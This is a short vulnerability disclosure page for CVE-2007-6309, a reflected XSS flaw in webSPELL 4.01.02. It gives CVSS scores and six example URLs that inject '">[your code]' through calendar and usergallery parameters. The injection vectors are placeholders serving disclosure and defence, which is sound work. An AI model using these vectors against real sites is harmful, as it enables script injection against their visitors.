webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

2007.12.11

Credit: Brainhead

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2007-6309

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

###################
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.